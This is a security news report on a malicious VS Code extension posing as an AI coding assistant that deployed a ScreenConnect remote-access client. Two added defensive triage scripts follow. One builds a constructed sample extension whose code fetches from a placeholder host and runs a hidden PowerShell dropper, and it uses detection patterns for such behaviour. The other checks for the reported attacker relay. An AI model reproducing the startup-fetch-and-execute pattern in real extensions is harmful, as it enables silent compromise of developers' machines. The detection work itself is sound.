A weaponized VS Code extension disguised as an AI coding assistant was recently found delivering ScreenConnect, a legitimate remote access tool repurposed here as a Remote Access Trojan (RAT). Security researchers flagged the malicious extension, which posed as a “ClawdBot Agent,” on January 27, 2026. The imposter exploited the trust developers place in their integrated development environments (IDEs) to distribute malware, a significant threat to the developer community.
The fake ClawdBot Agent extension mimicked the functionality of legitimate AI-powered tools and even integrated with well-known providers such as OpenAI, Anthropic, and Google, which helped it pass initial scrutiny and gain users’ trust. Once installed, it silently launched its malicious payload, deploying malware onto Windows systems without any user interaction or visible sign. After Microsoft was notified, the extension was removed from the Visual Studio Marketplace.
Infection Mechanism and ScreenConnect Deployment
Aikido Security analysts examined the mechanics of the threat and uncovered a multi-stage infection chain. The extension contained code that ran automatically every time Visual Studio Code was launched. This initial JavaScript contacted an external server to fetch configuration instructions, which in turn drove the download and execution of several malicious files camouflaged as legitimate system components.
The most alarming aspect of the attack was the abuse of legitimate remote access software. Once the initial dropper ran, it installed ScreenConnect, a widely used IT support tool, but with a client configuration pointing at an attacker-controlled relay at meeting.bulletmailer.net on port 8041. The threat actors had stood up their own ScreenConnect relay server and pre-packaged client installers, which were then distributed through the fraudulent VS Code extension. Victims thus unknowingly installed a fully functional ScreenConnect client that immediately connected out to the attackers’ infrastructure.
To bolster resilience, the attack also included a Rust-based DLL that provided a redundant delivery channel: it fetched backup payloads from Dropbox under the guise of a Zoom update. This layered approach let the attackers keep access and continue operating even if their primary command-and-control servers were taken down. The use of three distinct fallback mechanisms points to careful operational planning by the threat actors behind this weaponized VS Code extension.
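The chain above has a recognisable shape in the extension's own files: an activation event that fires at editor startup, a network fetch for instructions, and a call into the shell to run what was fetched. The script below, added here as an illustration and not Aikido's tooling, triages installed VS Code extensions for that combination. The two extensions it builds for the demonstration are constructed stand-ins (a fake publisher, a look-alike startup script), not the real artefact, and the indicator regexes are assumptions about what such code looks like rather than signatures from the report.

```python
"""Triage installed VS Code extensions for startup activation combined with
a network fetch and command execution.  Added example, not Aikido's tooling;
the sample extensions it writes are constructed stand-ins."""
import json
import re
import tempfile
from pathlib import Path

# Activation events that run extension code with no user action at all.
AUTO_ACTIVATION = {"*", "onStartupFinished"}

# Crude source-level indicators of "download something, then run it" (assumed patterns).
INDICATORS = {
    "child_process": r"require\(['\"]child_process['\"]\)",
    "exec/spawn": r"\b(?:exec|execSync|execFile|spawn|spawnSync)\s*\(",
    "http_fetch": r"\b(?:https?\.get|https?\.request|fetch|axios)\s*\(",
    "powershell": r"(?i)powershell",
    "rundll32": r"(?i)rundll32",
    "drops_binary": r"\.(?:exe|dll|msi)['\"]",
}


def scan_extension(ext_dir: Path) -> dict:
    """Return activation mode and indicator hits for one extension folder."""
    manifest = json.loads((ext_dir / "package.json").read_text(encoding="utf-8"))
    auto = bool(set(manifest.get("activationEvents", [])) & AUTO_ACTIVATION)
    hits = set()
    for js_file in ext_dir.rglob("*.js"):
        if "node_modules" in js_file.parts:   # bundled deps would drown the signal
            continue
        text = js_file.read_text(encoding="utf-8", errors="ignore")
        for name, pattern in INDICATORS.items():
            if re.search(pattern, text):
                hits.add(name)
    runs_commands = bool(hits & {"child_process", "exec/spawn"})
    return {
        "id": f"{manifest.get('publisher')}.{manifest.get('name')}",
        "auto_activation": auto,
        "indicators": sorted(hits),
        # The combination is what matters: startup activation + fetch + exec.
        "suspicious": auto and runs_commands and "http_fetch" in hits,
    }


def scan_all(root: Path) -> list:
    return [scan_extension(d) for d in sorted(root.iterdir())
            if (d / "package.json").is_file()]


def build_constructed_samples(root: Path) -> None:
    """Write a constructed look-alike of the described chain and a benign extension."""
    bad = root / "fakepub.clawdbot-agent-1.0.0"
    bad.mkdir(parents=True)
    (bad / "package.json").write_text(json.dumps({
        "name": "clawdbot-agent", "publisher": "fakepub",
        "activationEvents": ["*"], "main": "./extension.js"}))
    (bad / "extension.js").write_text(
        "const https = require('https');\n"
        "const { execSync } = require('child_process');\n"
        "function activate() {\n"
        "  // constructed: fetch remote config, then run a dropper\n"
        "  https.get('https://config.invalid/cfg', res => {\n"
        "    execSync('powershell -WindowStyle Hidden -File dropper.ps1');\n"
        "  });\n"
        "}\nmodule.exports = { activate };\n")
    good = root / "goodpub.spell-checker-2.3.1" / "out"
    good.mkdir(parents=True)
    (good.parent / "package.json").write_text(json.dumps({
        "name": "spell-checker", "publisher": "goodpub",
        "activationEvents": ["onLanguage:markdown"], "main": "./out/extension.js"}))
    (good / "extension.js").write_text(
        "const vscode = require('vscode');\n"
        "function activate(ctx) { vscode.window.showInformationMessage('ready'); }\n"
        "module.exports = { activate };\n")


def demo() -> dict:
    """Scan the constructed samples in a temp dir; results keyed by extension id."""
    root = Path(tempfile.mkdtemp())
    build_constructed_samples(root)
    return {r["id"]: r for r in scan_all(root)}


if __name__ == "__main__":
    for row in demo().values():
        print(row)
    real_root = Path.home() / ".vscode" / "extensions"   # default install location
    if real_root.is_dir():
        for row in scan_all(real_root):
            if row["suspicious"]:
                print("REVIEW:", row)
```

The verdict is deliberately a conjunction: plenty of legitimate extensions spawn processes (linters, language servers) and plenty fetch over HTTP, so either alone is noise. Treat a hit as a prompt to read the flagged file, not as proof; a scanner this simple is trivially evaded by string obfuscation.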
Anyone who installed the extension should uninstall it immediately, remove any ScreenConnect client it deployed, and block the identified infrastructure (meeting.bulletmailer.net) at the network edge. API keys for any AI services configured through the compromised extension (OpenAI, Anthropic, Google) should also be rotated, since the extension had access to them. The incident is a powerful reminder to verify the publisher and reputation of any extension before installing it.
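Two points from the relay description and the remediation advice above deserve a concrete check. First, an installed ScreenConnect client carries its relay host and port in the query-string argument of its service launch command, so the attacker relay is visible on disk without any network capture. Second, "remove ScreenConnect" is too blunt for an organisation whose helpdesk legitimately uses it, and port 8041 is ScreenConnect's normal relay port, so the host, not the port, is the discriminator. The script below is an added example, not Aikido's or ConnectWise's tooling; the service launch strings are constructed, the allowlist entry is hypothetical, and only the relay host and port come from the report.

```python
"""Find ScreenConnect client installs and separate the ones pointed at the
attacker relay from legitimately deployed ones.  Added example; the
ImagePath values are constructed and the allowlist is hypothetical."""
import re
from typing import Optional
from urllib.parse import parse_qs

# Relay reported in the write-up.
KNOWN_BAD_RELAYS = {("meeting.bulletmailer.net", 8041)}
# Hypothetical allowlist: relays your own helpdesk actually uses.
ALLOWED_RELAYS = {("support.corp.example", 8041)}

# Constructed service ImagePath values in the form ScreenConnect clients use:
# "<path>\ScreenConnect.ClientService.exe" "?e=...&y=...&h=<relay>&p=<port>&..."
SAMPLE_IMAGE_PATHS = [
    r'"C:\Program Files (x86)\ScreenConnect Client (a1b2c3d4e5f6a7b8)\ScreenConnect.ClientService.exe" '
    r'"?e=Access&y=Guest&h=meeting.bulletmailer.net&p=8041&s=CONSTRUCTED-SESSION&k=CONSTRUCTED-KEY"',
    r'"C:\Program Files (x86)\ScreenConnect Client (0f0e0d0c0b0a0908)\ScreenConnect.ClientService.exe" '
    r'"?e=Access&y=Guest&h=support.corp.example&p=8041&s=CONSTRUCTED-SESSION&k=CONSTRUCTED-KEY"',
    r'"C:\Windows\System32\svchost.exe" -k netsvcs',   # unrelated service, ignored
]

LAUNCH_ARGS = re.compile(r'"\?([^"]*)"')


def parse_client_launch(image_path: str) -> Optional[dict]:
    """Extract relay host/port from a ScreenConnect client launch string."""
    if "screenconnect" not in image_path.lower():
        return None
    m = LAUNCH_ARGS.search(image_path)
    if not m:
        return None
    params = {k: v[0] for k, v in parse_qs(m.group(1)).items()}
    try:
        port = int(params.get("p", ""))
    except ValueError:
        port = 0
    return {"host": params.get("h", ""), "port": port,
            "session_type": params.get("e"), "process_type": params.get("y")}


def verdict(host: str, port: int) -> str:
    if (host, port) in KNOWN_BAD_RELAYS:
        return "known-malicious"
    if (host, port) in ALLOWED_RELAYS:
        return "allowlisted"
    # 8041 is the usual ScreenConnect relay port, so the port alone proves nothing.
    return "unknown"


def triage(image_paths) -> list:
    rows = []
    for path in image_paths:
        parsed = parse_client_launch(path)
        if parsed:
            parsed["verdict"] = verdict(parsed["host"], parsed["port"])
            rows.append(parsed)
    return rows


def collect_service_image_paths() -> list:
    """On Windows, read every service's ImagePath from the registry."""
    import winreg   # Windows-only; ImportError elsewhere
    paths = []
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE,
                        r"SYSTEM\CurrentControlSet\Services") as services:
        i = 0
        while True:
            try:
                name = winreg.EnumKey(services, i)
            except OSError:
                break
            i += 1
            try:
                with winreg.OpenKey(services, name) as svc:
                    paths.append(winreg.QueryValueEx(svc, "ImagePath")[0])
            except OSError:
                continue
    return paths


if __name__ == "__main__":
    try:
        image_paths = collect_service_image_paths()
    except ImportError:
        image_paths = SAMPLE_IMAGE_PATHS   # not on Windows: run on the constructed data
    for row in triage(image_paths):
        print(row)
```

Anything that comes back "known-malicious" is a confirmed foothold: stop and remove that service, then treat the host as compromised rather than merely cleaned, since the attacker had interactive remote access. Entries marked "unknown" need a human to confirm whether the relay belongs to a vendor or MSP before they are torn out.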
The ongoing evolution of threats targeting developer tools underscores the need for continuous vigilance and robust security practices within the software development lifecycle. As attackers become more sophisticated in their deception tactics, security researchers anticipate further attempts to leverage trusted platforms for malicious purposes. Developers and organizations should remain informed about emerging threats and implement comprehensive security strategies to mitigate these risks effectively.

